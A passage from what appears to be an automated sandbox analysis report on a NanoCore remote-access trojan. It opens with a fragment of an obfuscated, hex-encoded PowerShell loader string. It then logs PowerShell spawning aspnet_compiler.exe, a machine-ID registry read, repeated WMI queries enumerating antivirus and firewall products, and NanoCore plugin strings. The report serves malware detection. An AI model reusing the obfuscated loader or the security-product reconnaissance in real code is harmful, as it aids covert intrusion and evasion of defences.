-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!-X-5-X-%7-X-%9-X-3b-X-0a-X-%-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-f-X-9-X-e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Jump to behavior

Source: aspnet_compiler.exe, 00000017.00000003.595769066.000000000364C000.00000004.00000001.sdmp	Binary or memory string: Program Manager
Source: aspnet_compiler.exe, 00000017.00000003.595426015.000000000345C000.00000004.00000001.sdmp	Binary or memory string: Program Manager\|$W
Source: aspnet_compiler.exe, 00000017.00000003.595769066.000000000364C000.00000004.00000001.sdmp	Binary or memory string: Program Manager4
Source: aspnet_compiler.exe, 00000017.00000003.595426015.000000000345C000.00000004.00000001.sdmp	Binary or memory string: Program Manager`

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0013~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct

Stealing of Sensitive Information:

Remote Access Functionality:

Detected Nanocore Rat

Show sources

Source: aspnet_compiler.exe, 00000017.00000003.461956661.00000000041C7000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: aspnet_compiler.exe, 00000017.00000003.461956661.00000000041C7000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
